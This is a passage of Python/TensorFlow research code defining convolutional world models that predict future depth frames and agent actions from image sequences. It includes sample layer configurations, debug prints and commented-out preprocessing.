scale_down_width = None, add_depth_gaussian = False, add_gaussians = False,
include_pose = False, store_jerk = True, use_projection = False,
num_classes = None, keep_prob = None, gpu_id = 0, **kwargs):
#print('------NETWORK START-----')
#with tf.device('/gpu:%d' % gpu_id):
# rescale inputs to be divisible by 8
#rinputs = {}
#for k in inputs:
# if k in ['depths', 'objects', 'vels', 'accs', 'jerks',
# 'vels_curr', 'accs_curr', 'actions_map', 'segmentation_map']:
# rinputs[k] = tf.pad(inputs[k],
# [[0,0], [0,0], [0,0], [3,3], [0,0]], "CONSTANT")
# # RESIZING IMAGES
# rinputs[k] = tf.unstack(rinputs[k], axis=1)
# for i, _ in enumerate(rinputs[k]):
# rinputs[k][i] = tf.image.resize_images(rinputs[k][i], [64, 88])
# rinputs[k] = tf.stack(rinputs[k], axis=1)
# else:
# rinputs[k] = inputs[k]
# preprocess input data
batch_size, time_seen, height, width = \
inputs['depths'].get_shape().as_list()[:4]
time_seen -= 1
long_len = time_seen + 1
#base_net = fp_base.ShortLongFuturePredictionBase(
# rinputs, store_jerk = store_jerk,
# normalization_method = normalization_method,
# time_seen = time_seen, stats_file = stats_file,
# scale_down_height = scale_down_height,
# scale_down_width = scale_down_width,
# add_depth_gaussian = add_depth_gaussian,
# add_gaussians = add_gaussians,
# get_hacky_segmentation_map = True,
# get_actions_map = True)
#inputs = base_net.inputs
# init network
m = ConvNetwithBypasses(**kwargs)
# encode per time step
main_attributes = ['depths']
main_input_per_time = [tf_concat([tf.cast(inputs[nm][:, t], tf.float32) \
for nm in main_attributes], axis = 3) for t in range(time_seen)]
# init projection matrix
if use_projection:
print('Using PROJECTION')
with tf.variable_scope('projection'):
P = tf.get_variable(name='P',
initializer=tf.eye(4),
#shape=[4, 4],
dtype=tf.float32)
# initial bypass
bypass_nodes = [[b] for b in tf.unstack(inputs['depths'][:,:time_seen], axis=1)]
# use projection
if use_projection:
for t in range(time_seen):
main_input_per_time[t] = apply_projection(main_input_per_time[t], P)
#bypass_nodes[t].append(main_input_per_time[t])
# conditioning
if 'use_segmentation' in cfg:
use_segmentation = cfg['use_segmentation']
else:
use_segmentation = False
print('Using ACTION CONDITIONING')
cond_attributes = ['actions_map']
if use_segmentation:
print('Using segmentations as conditioning')
cond_attributes.append('segmentation_map')
if 'cond_scale_factor' in cfg:
scale_factor = cfg['cond_scale_factor']
else:
scale_factor = 1
for att in cond_attributes:
if att in ['actions_map']:
inputs[att] = tf.reduce_sum(inputs[att], axis=-1, keep_dims=False)
if att in ['segmentation_map']:
inputs[att] = tf.reduce_sum(inputs[att], axis=-1, keep_dims=True)
shape = inputs[att].get_shape().as_list()
inputs[att] = tf.unstack(inputs[att], axis=1)
for t, _ in enumerate(inputs[att]):
inputs[att][t] = tf.image.resize_images(inputs[att][t],
[shape[2]/scale_factor, shape[3]/scale_factor],
method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
inputs[att] = tf.stack(inputs[att], axis=1)
cond_input_per_time = [tf_concat([inputs[nm][:, t] \
for nm in cond_attributes], axis = 3) for t in range(time_seen)]
encoded_input_cond = []
reuse_weights = False
print('right before bug loop')
for inpt in cond_input_per_time:
print(inpt)
for t in range(time_seen):
enc, bypass_nodes[t] = feedforward_conv_loop(
cond_input_per_time[t], m, cfg, desc = 'cond_encode',
bypass_nodes = bypass_nodes[t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True)
encoded_input_cond.append(enc[-1])
reuse_weights = True
# main
encoded_input_main = []
reuse_weights = False
for t in range(time_seen):
enc, bypass_nodes[t] = feedforward_conv_loop(
main_input_per_time[t], m, cfg, desc = 'main_encode',
bypass_nodes = bypass_nodes[t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True)
encoded_input_main.append(enc[-1])
reuse_weights = True
# calculate moments
bypass_nodes = [bypass_nodes]
moments = [encoded_input_main]
reuse_weights = False
assert time_seen-1 > 0, ('len(time_seen) = 0')
for i, mom in enumerate(range(time_seen-1, 0, -1)):
sub_bypass_nodes = []
for t in range(mom):
bn = []
for node in bypass_nodes[i][t]:
bn.append(node)
sub_bypass_nodes.append(bn)
bypass_nodes.append(sub_bypass_nodes)
sub_moments = []
for t in range(mom):
sm = moments[i]
if cfg['combine_moments'] == 'minus':
print('Using MINUS')
enc = sm[t+1] - sm[t]
elif cfg['combine_moments'] == 'concat':
print('Using CONCAT')
enc = tf_concat([sm[t+1], sm[t]], axis=3)
enc, bypass_nodes[i+1][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'combine_moments_encode',
bypass_nodes = bypass_nodes[i+1][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
enc = enc[-1]
enc, bypass_nodes[i+1][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'moments_encode',
bypass_nodes = bypass_nodes[i+1][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
sub_moments.append(enc[-1])
reuse_weights = True
moments.append(sub_moments)
# concat moments, main and cond
currents = []
reuse_weights = False
for i, moment in enumerate(moments):
sub_currents = []
for t, _ in enumerate(moment):
enc = tf_concat([moment[t],
encoded_input_main[t+i], #TODO first moments are main inputs already!
encoded_input_cond[t+i]], axis=3)
enc, bypass_nodes[i][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'moments_main_cond_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
sub_currents.append(enc[-1])
reuse_weights = True
currents.append(sub_currents)
# predict next moments via residuals (delta moments)
next_moments = []
delta_moments = []
reuse_weights = False
for i, current in enumerate(currents):
next_moment = []
delta_moment = []
for t, _ in enumerate(current):
dm, bypass_nodes[i][t] = feedforward_conv_loop(
current[t], m, cfg, desc = 'delta_moments_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
if cfg['combine_delta'] == 'plus':
print('Using PLUS')
nm = current[t] + dm[-1]
elif cfg['combine_delta'] == 'concat':
print('Using CONCAT')
nm = tf_concat([current[t], dm[-1]], axis=3)
nm, bypass_nodes[i][t] = feedforward_conv_loop(
nm, m, cfg, desc = 'combine_delta_encode',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
nm = nm[-1]
else:
raise KeyError('Unknown combine_delta')
reuse_weights = True
delta_moment.append(dm[-1])
next_moment.append(nm)
next_moments.append(next_moment)
delta_moments.append(delta_moment)
# concat next moments and main and reconstruct
nexts = []
reuse_weights = False
for i, moment in enumerate(next_moments):
sub_nexts = []
for t, _ in enumerate(moment):
# TODO: first moments are main inputs already!
# -> no need to concat for i == 0
# TODO: Higher moment reconstruction needs additional layers
# to match dimensions -> depth + vel + acc to next vel
# vs depth + vel to next depth -> only vel possible so far!
enc = tf_concat([moment[t], encoded_input_main[t+i]], axis=3)
enc, bypass_nodes[i][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'next_main_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
reuse_weights = True
sub_nexts.append(enc[-1])
nexts.append(sub_nexts)
# Deconvolution
num_deconv = cfg.get('deconv_depth')
reuse_weights = False
if num_deconv:
for i, moment in enumerate(moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(next_moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(delta_moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(nexts):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
retval = {
'pred_vel_1': moments[1][0],
'pred_delta_vel_1': delta_moments[1][0],
'pred_next_vel_1': next_moments[1][0],
'pred_next_img_1': nexts[1][0],
#'pred_next_vel_2': next_moments[0][1],
'bypasses': bypass_nodes,
'moments': moments,
'delta_moments': delta_moments,
'next_moments': next_moments,
'next_images': nexts
}
retval.update(inputs)
print('------NETWORK END-----')
print('------BYPASSES-------')
for i, node in enumerate(bypass_nodes[1][0]):
print(i, bypass_nodes[1][0][i])
for i, mn in enumerate(bypass_nodes):
for j, tn in enumerate(mn):
print('------LENGTH------', i, j, len(tn))
#for k, bn in enumerate(tn):
# print(i, j, k, bn)
print(len(bypass_nodes))
return retval, m.params
def hidden_loop_with_bypasses(input_node, m, cfg, nodes_for_bypass = [], stddev = .01, reuse_weights = False, activation = 'relu', train = True):
assert len(input_node.get_shape().as_list()) == 2, len(input_node.get_shape().as_list())
hidden_depth = cfg['hidden_depth']
m.output = input_node
for i in range(1, hidden_depth + 1):
print(m.output.get_shape().as_list())
with tf.variable_scope('hidden' + str(i)) as scope:
if reuse_weights:
scope.reuse_variables()
bypass = cfg['hidden'][i].get('bypass')
if bypass:
bypass_node = nodes_for_bypass[bypass]
m.add_bypass(bypass_node)
nf = cfg['hidden'][i]['num_features']
my_activation = cfg['hidden'][i].get('activation')
if my_activation is None:
my_activation = activation
if train:
my_dropout = cfg['hidden'][i].get('dropout')
else:
my_dropout = None
m.fc(nf, init = 'xavier', activation = my_activation, bias = .01, stddev = stddev, dropout = my_dropout)
nodes_for_bypass.append(m.output)
print(m.output.get_shape().as_list())
return m.output
def flatten_append_unflatten(start_state, action, cfg, m):
x = flatten(start_state)
action = flatten(action)
joined = tf_concat([x, action], 1)
x = hidden_loop_with_bypasses(joined, m, cfg['mlp'], reuse_weights = False, train = True)
reshape_dims = cfg['reshape_dims']
# assert np.prod(reshape_dims) == tf.shape(joined)[-1], (np.prod(reshape_dims), tf.shape(joined)[-1])
return tf.reshape(x, [-1] + reshape_dims)
class DepthFuturePredictionWorldModel():
def __init__(self, cfg, action_state_join_model = flatten_append_unflatten):
print('Warning! dropout train/test not currently being handled.')
with tf.variable_scope('wm'):
#state shape gives the state of one shape. The 'states' variable has an extra timestep, which it cuts up into the given and future states.
states_shape = list(cfg['state_shape'])
states_shape[0] += 1
#Knowing the batch size is not truly needed, but until we need this to be adaptive, might as well keep it
#The fix involves getting shape information to deconv
bs = cfg['batch_size']
self.states = tf.placeholder(tf.float32, [bs] + states_shape)
self.s_i = x = self.states[:, :-1]
self.s_f = s_f = self.states[:, 1:]
self.action = tf.placeholder(tf.float32, [bs] + cfg['action_shape'])
#convert from 3-channel encoding
self.processed_input = x = postprocess_depths(x)
s_f = postprocess_depths(s_f)
#flatten time dim
x = tf_concat([x[:, i] for i in range(cfg['state_shape'][0])], 3)
#encode
m = ConvNetwithBypasses()
all_encoding_layers = feedforward_conv_loop(x, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)
x = all_encoding_layers[-1]
joined = action_state_join_model(x, self.action, cfg['action_join'], m)
decoding = deconv_loop(
joined, m, cfg['deconv'], desc='deconv',
bypass_nodes = all_encoding_layers, reuse_weights = False,
batch_normalize = False,
do_print = True)
self.pred = decoding[-1]
self.tv = s_f[:, -1]
diff = self.pred - self.tv
diff = flatten(diff)
per_sample_norm = cfg.get('per_sample_normalization')
if per_sample_norm == 'reduce_mean':
self.loss_per_example = tf.reduce_mean(diff * diff / 2., axis = 1)
else:
self.loss_per_example = tf.reduce_sum(diff * diff / 2., axis = 1)
self.loss = tf.reduce_mean(self.loss_per_example)
#self.loss = tf.nn.l2_loss(self.tv - self.pred) #bs #(bs * np.prod(cfg['state_shape']))
sample_depth_future_cfg = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'action_join' : {
'reshape_dims' : [8, 8, 5],
'mlp' : {
'hidden_depth' : 2,
'hidden' : {
1 : {'num_features' : 320, 'dropout' : .75},
2 : {'num_features' : 320, 'activation' : 'identity'}
}
}
},
'encode' : {
'encode_depth' : 3,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'deconv' : {
'deconv_depth' : 3,
'deconv' : {
1 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 0},
3 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 1}, 'bypass' : 0}
}
}
}
a_bigger_depth_future_config = {
'state_shape' : [2, 64, 64, 3],
'action_shape' : [2, 8],
'action_join' : {
'reshape_dims' : [8, 8, 5],
'mlp' : {
'hidden_depth' : 3,
'hidden' : {
1 : {'num_features' : 320},
2 : {'num_features' : 320},
3 : {'num_features' : 320, 'activation' : 'identity'}
}
}
},
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 5}},
}
},
'deconv' : {
'deconv_depth' : 5,
'deconv' : {
1 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 4},
2 : {'deconv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}, 'bypass' : 3},
3 : {'deconv' : {'filter_size' : 5, 'stride' : 2, 'num_filters' : 20}, 'bypass' : 2},
4 : {'deconv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}, 'bypass' : 1},
5 : {'deconv' : {'filter_size' : 5, 'stride' : 1, 'num_filters' : 1}, 'bypass' : 0}
}
}
}
class ActionModel(object):
def __init__(self, cfg):
states_shape = list(cfg['state_shape'])
states_shape[0] += 1
self.states = tf.placeholder(tf.float32, [None] + states_shape)
self.s_i = s_i = self.states[:, :-1]
self.s_f = s_f = self.states[:, 1:]
self.action = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
self.action_post = tf.placeholder(tf.float32, [None] + cfg['action_shape'])
last_action = self.action[:, 0]
tv_action = self.action_post[:, -1]
#encode
s_i = tf_concat([s_i[:, i] for i in range(cfg['state_shape'][0])], 3)
s_f = tf_concat([s_f[:, i] for i in range(cfg['state_shape'][0])], 3)
s_i = postprocess_std(s_i)
s_f = postprocess_std(s_f)
m = ConvNetwithBypasses()
with tf.variable_scope('encode_model'):
s_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False)[-1]
s_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
#action mlp
enc_i_flat = flatten(s_i)
enc_f_flat = flatten(s_f)
if cfg['action_model'].get('include_last_action'):
to_concat = [enc_i_flat, enc_f_flat, last_action]
else:
to_concat = [enc_i_flat, enc_f_flat]
enc_in = tf_concat(to_concat, 1)
self.act_pred = hidden_loop_with_bypasses(enc_in, m, cfg['action_model']['mlp'], reuse_weights = False, train = True)
#loss
loss_factor = cfg['action_model'].get('loss_factor', 1.)
self.act_loss = tf.nn.l2_loss(self.act_pred - tv_action) * loss_factor
def get_action_model(inputs, cfg, reuse_weights = False):
s_i, s_f, act_given, act_tv = inputs['s_i'], inputs['s_f'], inputs['act_given'], inputs['act_tv']
time_len = cfg['state_shape'][0]
assert time_len == s_i.get_shape().as_list()[1] and time_len == s_f.get_shape().as_list()[1]
s_i = tf_concat([s_i[:, i] for i in range(time_len)], 3)
s_f = tf_concat([s_f[:, i] for i in range(time_len)], 3)
s_i = postprocess_std(s_i)
s_f = postprocess_std(s_f)
m = ConvNetwithBypasses()
#encode
with tf.variable_scope('encode_model'):
encoding_i = feedforward_conv_loop(s_i, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
encoding_f = feedforward_conv_loop(s_f, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = True, batch_normalize = False, no_nonlinearity_end = False)[-1]
enc_i_flat = flatten(encoding_i)
enc_f_flat = flatten(encoding_f)
if 'mlp_before_concat' in cfg['action_model']:
with tf.variable_scope('before_action'):
enc_i_flat = hidden_loop_with_bypasses(enc_i_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
enc_f_flat = hidden_loop_with_bypasses(enc_f_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = True, train = True)
assert act_given.get_shape().as_list()[1] == 1
act_given = act_given[:, 0]
x = tf_concat([enc_i_flat, enc_f_flat, act_given], 1)
with tf.variable_scope('action_model'):
x = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
lpe, loss = cfg['action_model']['loss_func'](act_tv, x, cfg['action_model'])
return {'act_loss_per_example' : lpe, 'act_loss' : loss, 'pred' : x}
def l2_loss_per_example(tv, pred, cfg):
diff = tv - pred
lpe = tf.reduce_sum(diff * diff, axis = 1, keep_dims = True) / 2. * cfg.get('loss_factor', 1.)
loss = tf.reduce_mean(lpe)
return lpe, loss
class MoreInfoActionWorldModel(object):
def __init__(self, cfg):
#placeholder setup
num_timesteps = cfg['num_timesteps']
image_shape = list(cfg['image_shape'])
state_steps = list(cfg['state_steps'])
states_given = list(cfg['states_given'])
actions_given = list(cfg['actions_given'])
act_dim = cfg['act_dim']
t_back = - (min(state_steps) + min(states_given))
t_forward = max(state_steps) + max(states_given)
states_shape = [num_timesteps + t_back + t_forward] + image_shape
self.states = tf.placeholder(tf.uint8, [None] + states_shape)
states_cast = tf.cast(self.states, tf.float32)
postprocess_method = cfg.get('postprocess')
if postprocess_method == 'depths1':
states_cast = postprocess_depths(states_cast)
elif postprocess_method == 'images1':
states_cast = postprocess_std(states_cast)
else:
assert postprocess_method is None
acts_shape = [num_timesteps + max(max(actions_given), 0) - min(actions_given), act_dim]
self.action = tf.placeholder(tf.float32, [None] + acts_shape)#could actually be smaller for action prediction, but for a more general task keep the same size
self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
act_back = - min(actions_given)
if cfg.get('include_obj_there', False):
self.obj_there_via_msg = tf.placeholder(tf.int64, [None, acts_shape[0]], name = 'obj_there_via_msg')
#things we gotta fill in
self.act_loss_per_example = []
self.act_pred = []
#start your engines
m = ConvNetwithBypasses()
#concat states at all timesteps needed
states_collected = {}
#this could be more general, for now all timesteps tested on are adjacent, but one could imagine this changing...
for t in range(num_timesteps):
for s in states_given:
if t + s not in states_collected:
states_collected[t+s] = tf_concat([states_cast[:, t + s + i + t_back] for i in state_steps], axis = 3)
#a handle for uncertainty modeling. should probably do this in a more general way.
um_begin_idx, um_end_idx = cfg.get('um_state_idxs', (1, 3))
um_act_idx = cfg.get('um_act_idx', 2)
self.s_i = self.states[:, um_begin_idx:um_end_idx]
self.action_for_um = self.action[:, um_act_idx]
if cfg.get('include_obj_there', False):
self.obj_there_supervision = self.obj_there_via_msg[:,cfg.get('obj_there_supervision_idx', 2)]
print('in moreinfo wm')
print(self.obj_there_supervision)
#good job. now encode each state
reuse_weights = False
flat_encodings = {}
flat_encodings_no_mlp = {}
for s, collected_state in states_collected.iteritems():
with tf.variable_scope('encode_model'):
encoding = feedforward_conv_loop(collected_state, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
flat_encodings_no_mlp[s] = encoding
enc_flat = flatten(encoding)
if 'mlp_before_concat' in cfg['action_model']:
with tf.variable_scope('before_action'):
enc_flat = hidden_loop_with_bypasses(enc_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
flat_encodings[s] = enc_flat
#reuse weights after first time doing computation
reuse_weights = True
#just hardcode this for now
#assuming that the timestep before the action corresponds to states_given[1]
self.encoding_for_um = flat_encodings_no_mlp[states_given[1]]
#great. now let's make our predictions and count our losses
act_loss_list = []
acc_01_list = []
reuse_weights = False
for t in range(num_timesteps):
encoded_states_given = [flat_encodings[t + s] for s in states_given]
act_given = [self.action[:, t + a + act_back] for a in actions_given]
act_tv = self.action_post[:, t + act_back]
x = tf_concat(encoded_states_given + act_given, axis = 1)
with tf.variable_scope('action_model'):
pred = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
lpe, loss = cfg['action_model']['loss_func'](act_tv, pred, cfg['action_model'])
acc_01 = binned_01_accuracy_per_example(act_tv, pred, cfg['action_model'])
reuse_weights = True
acc_01_list.append(tf.cast(acc_01, tf.float32))
self.act_loss_per_example.append(lpe)
self.act_pred.append(pred)
act_loss_list.append(loss)
if cfg.get('norepeat', False):
self.act_loss = act_loss_list[0]
else:
self.act_loss = tf.reduce_mean(act_loss_list)
self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
#adding on readouts
self.obj_there_loss = []
self.num_obj_there = []
self.obj_not_there_loss = []
self.object_there = []
obj_there_per_dim_list = []
avg_acc_obj_there = []
avg_acc_obj_not_there = []
for t in range(num_timesteps):
act_tv = self.action_post[:, t + act_back]
force_norm = tf.reduce_sum(act_tv[:, 2:] * act_tv[:, 2:], axis = 1, keep_dims = True)
obj_there = tf.cast(tf.greater(force_norm, .0001), tf.float32)
obj_there_per_dim = tf.tile(obj_there, [1, act_dim])
obj_there_per_dim_list.append(obj_there_per_dim)
# avg_acc_obj_there.append(tf.reduce_sum(obj_there_per_dim * acc_01_list[t], axis = 0) / tf.reduce_sum(obj_there))
# avg_acc_obj_not_there.append(tf.reduce_sum((1. - obj_there_per_dim) * acc_01_list[t], axis = 0) / tf.reduce_sum(1. - obj_there))
# self.obj_there_loss.append(tf.reduce_sum(obj_there * self.act_loss_per_example[t]) / tf.reduce_sum(obj_there))
# self.obj_not_there_loss.append(tf.reduce_sum((1. - obj_there) * self.act_loss_per_example[t]) / tf.reduce_sum(1. - obj_there))
self.num_obj_there.append(tf.reduce_sum(obj_there))
self.object_there.append(obj_there)
avg_acc_obj_there = sum([tf.reduce_sum(obj_there_per_dim_list[t] * acc_01_list[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
avg_acc_obj_not_there = sum([tf.reduce_sum((1. - obj_there_per_dim_list[t]) * acc_01_list[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
self.obj_there_loss = sum([tf.reduce_sum(self.object_there[t] * self.act_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(self.object_there[t]) for t in range(num_timesteps)])
self.obj_not_there_loss = sum([tf.reduce_sum((1. - self.object_there[t]) * self.act_loss_per_example[t], axis = 0)\
for t in range(num_timesteps)]) / sum([tf.reduce_sum(1. - self.object_there[t]) for t in range(num_timesteps)])
self.readouts = {'act_pred' : self.act_pred, 'act_loss' : self.act_loss,
'obj_there_loss_noprint' : self.obj_there_loss, 'obj_not_there_loss_noprint' : self.obj_not_there_loss,
'num_obj_there_noprint' : self.num_obj_there, 'acc_obj_there_noprint' : avg_acc_obj_there,
'acc_obj_not_there_noprint' : avg_acc_obj_not_there}
self.save_to_gfs = ['act_pred']
class LatentMoreInfoActionWorldModel(object):
def __init__(self, cfg):
#placeholder setup
num_timesteps = cfg['num_timesteps']
image_shape = list(cfg['image_shape'])
state_steps = list(cfg['state_steps'])
states_given = list(cfg['states_given'])
actions_given = list(cfg['actions_given'])
fm_states_given = list(cfg['fm_states_given'])
fm_actions_given = list(cfg['fm_actions_given'])
act_dim = cfg['act_dim']
t_back = - (min(state_steps) + min(states_given))
t_forward = max(state_steps) + max(states_given)
states_shape = [num_timesteps + t_back + t_forward] + image_shape
self.states = tf.placeholder(tf.uint8, [None] + states_shape)
states_cast = tf.cast(self.states, tf.float32)
postprocess_method = cfg.get('postprocess')
if postprocess_method == 'depths1':
states_cast = postprocess_depths(states_cast)
elif postprocess_method == 'images1':
states_cast = postprocess_std(states_cast)
else:
assert postprocess_method is None
acts_shape = [num_timesteps + max(max(actions_given), 0) - min(actions_given), act_dim]
self.action = tf.placeholder(tf.float32, [None] + acts_shape)#could actually be smaller for action prediction, but for a more general task keep the same size
self.action_post = tf.placeholder(tf.float32, [None] + acts_shape)
act_back = - min(actions_given)
#things we gotta fill in
self.act_loss_per_example = []
self.act_pred = []
self.fut_loss_per_example = []
self.fut_pred = []
#start your engines
m = ConvNetwithBypasses()
#concat states at all timesteps needed
states_collected = {}
#this could be more general, for now all timesteps tested on are adjacent, but one could imagine this changing...
for t in range(num_timesteps):
print('Timestep ' + str(t))
for s in states_given:
if t + s not in states_collected:
print('State ' + str(s))
print('Images ' + str([t + s + i + t_back for i in state_steps]))
states_collected[t+s] = tf_concat([states_cast[:, t + s + i + t_back] for i in state_steps], axis = 3)
#a handle for uncertainty modeling. should probably do this in a more general way. might be broken as-is!
um_begin_idx, um_end_idx = cfg.get('um_state_idxs', (1, 3))
um_act_idx = cfg.get('um_act_idx', 2)
self.s_i = self.states[:, um_begin_idx:um_end_idx]
self.action_for_um = self.action[:, um_act_idx]
#good job. now encode each state
reuse_weights = False
flat_encodings = {}
flat_encodings_pre_mlp = {}
for s, collected_state in states_collected.iteritems():
with tf.variable_scope('encode_model'):
encoding = feedforward_conv_loop(collected_state, m, cfg['encode'], desc = 'encode', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
enc_flat = flatten(encoding)
flat_encodings_pre_mlp[s] = enc_flat
if 'mlp_before_concat' in cfg['action_model']:
with tf.variable_scope('before_action'):
enc_flat = hidden_loop_with_bypasses(enc_flat, m, cfg['action_model']['mlp_before_concat'], reuse_weights = reuse_weights, train = True)
flat_encodings[s] = enc_flat
#reuse weights after first time doing computation
reuse_weights = True
self.encoding_for_um = flat_encodings_pre_mlp[states_given[1]]
#great. now let's make our action predictions and count our losses
act_loss_list = []
acc_01_list = []
reuse_weights = False
for t in range(num_timesteps):
encoded_states_given = [flat_encodings[t + s] for s in states_given]
act_given = [self.action[:, t + a + act_back] for a in actions_given]
act_tv = self.action_post[:, t + act_back]
x = tf_concat(encoded_states_given + act_given, axis = 1)
with tf.variable_scope('action_model'):
pred = hidden_loop_with_bypasses(x, m, cfg['action_model']['mlp'], reuse_weights = reuse_weights, train = True)
lpe, loss = cfg['action_model']['loss_func'](act_tv, pred, cfg['action_model'])
acc_01 = binned_01_accuracy_per_example(act_tv, pred, cfg['action_model'])
acc_01_list.append(tf.cast(acc_01, tf.float32))
reuse_weights = True
self.act_loss_per_example.append(lpe)
self.act_pred.append(pred)
act_loss_list.append(loss)
if cfg.get('norepeat', False):
self.act_loss = act_loss_list[0]
else:
self.act_loss = tf.reduce_mean(act_loss_list)
self.act_var_list = [var for var in tf.global_variables() if 'action_model' in var.name or 'before_action' in var.name]
self.encode_var_list = [var for var in tf.global_variables() if 'encode_model' in var.name]
#super. now for the latent-space future model.
fut_loss_list = []
reuse_weights = False
for t in range(num_timesteps):
encoded_states_given = [flat_encodings_pre_mlp[t + s] for s in fm_states_given]
act_given = [self.action[:, t + a + act_back] for a in fm_actions_given]
fut_tv = flat_encodings_pre_mlp[t]
x = tf_concat(encoded_states_given + act_given, axis = 1)
with tf.variable_scope('future_model'):
pred = hidden_loop_with_bypasses(x, m, cfg['future_model']['mlp'], reuse_weights = reuse_weights, train = True)
print('sizes')
print(pred)
encoding_dim = fut_tv.get_shape().as_list()[-1]
normalized_fut_tv = np.sqrt(encoding_dim) * tf.nn.l2_normalize(fut_tv, dim = 1)
lpe, loss = cfg['future_model']['loss_func'](normalized_fut_tv, pred, cfg['future_model'])
reuse_weights = True
self.fut_loss_per_example.append(lpe)
self.fut_pred.append(pred)
fut_loss_list.append(loss)
if cfg.get('norepeat', True):
self.fut_loss = fut_loss_list[0]
else:
